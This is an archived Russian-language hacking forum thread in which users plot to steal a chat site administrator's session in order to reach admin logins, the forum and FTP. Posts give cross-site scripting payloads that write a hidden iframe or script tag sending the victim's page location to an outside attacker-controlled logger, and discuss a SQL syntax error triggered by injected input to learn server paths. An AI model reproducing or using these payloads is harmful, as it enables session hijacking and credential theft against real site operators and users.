Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
05.11.2004, 15:58
|
|
Новичок
Регистрация: 30.10.2004
Сообщений: 16
Провел на форуме:
0
Репутация:
0
|
|
Андрюш, я вообще-то от идеи использовать куки сразу отказалс, т.к. в куки передается только номер комнаты, номер цвета и название ника, вот потому я использовал следующий код
<html>
<head>
</head>
<body>
<tr><td>
<img src=" http://chat/photos/26.big.jpg">
<script src=" http://antichat.ru/cgi-bin/s.jpg?zz_...ation.href>
</script>
</td></tr>
</body>
</html>
НО... как я говорил, в Реферере передается ссылка на картинку, а не адресная строка того, кто кликнул по этой ссылке, вот в чем загвоздка...
А получив сессию Верховного Админа чата можно и в Админку залезть и посмотреть Логины и Пароли всех остальных админов, а также получить доступ к Форуму и ФТП (это особо интересно), т.к. я не думаю, что у "этого" админа разные пароли на Чат, Форум и ФТП )))))
Насколько я вычитал в доках по ЯваСкриптам и ВБСкриптам, то различают Серверные скрипты и клиентские, т.е. все же с помощью ЯваСкрипта можно получить доступ к файлам на серевере, только вот что это за Серверные скрипты и какое условие должно выполняться, чтобы сервер воспринял скрипт как серверный....? |
|
|
05.11.2004, 16:08
|
|
Новичок
Регистрация: 30.10.2004
Сообщений: 16
Провел на форуме:
0
Репутация:
0
|
|
И вот еще что... почему я спрашивал по поводу
<script>alert('as');</script>- тут интереснее
database error: cannot search user
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'as');%'' at line 1
Чтобы была возможность узнать полный путь на сервере к чату....
Вопрос собствено к пр0х0жему - каким образом и каким кодом ему удалось вызвать синтаксическую ошибку?
|
|
|
|
05.11.2004, 18:26
|
|
Участник форума
Регистрация: 11.06.2004
Сообщений: 266
Провел на форуме:
15191
Репутация:
13
|
|
Игорёк объясняю тебе!!! вообщем забей на это снифер!!! пользуйся моим изобретением... вообщем такого я понял что ты имеешь ввиду ... вот исход файла
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td> Исходный код </td></tr><tr><td id="CODE">
<script>
var smr = "http://seechat.fatal.ru/friker/frika.php?" + location.href;
document.write("<iframe src="+smr+" width=0 heigth=0></iframe>")
</script>
[/QUOTE]<span id='postcolor'>
Как видишь мы получаем локатион окна к которому обратился юзер... вот почему у тебя в рефере и пишет путь к картинке ... Понял ? нет?
вот! вспомни как нащёт старого чата я делал... я посылал ник со скриптом в сам чат... но там ишла ещё + картинка которая не показывалась и при входе в чат админ видел наш ник и отсылались к нам окно администтратора там ГДЕ скрипт наш.. тоесть окно фрэйма look понял??? значит это нам ничего не даст, нащёт этого даже можешь не пробовать... потому что при откытии это окна к нам отошлётса его рефер с нащей же картинко... нужно скрипт это заливать в чат сам... вот! но идея совсем другая... нужно вообщем через этот скрипт обратитса к окну его, но трабла в чём, в том что может у него быть 5 а может и 10 окон открыто... тоеть нужно юзать через TITLE чтоб TITLE ID окна был = "Нашему чату" |
|
|
|
05.11.2004, 18:26
|
|
Участник форума
Регистрация: 11.06.2004
Сообщений: 266
Провел на форуме:
15191
Репутация:
13
|
|
а путь тебе узнавать не надо! я путь уже знаю!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
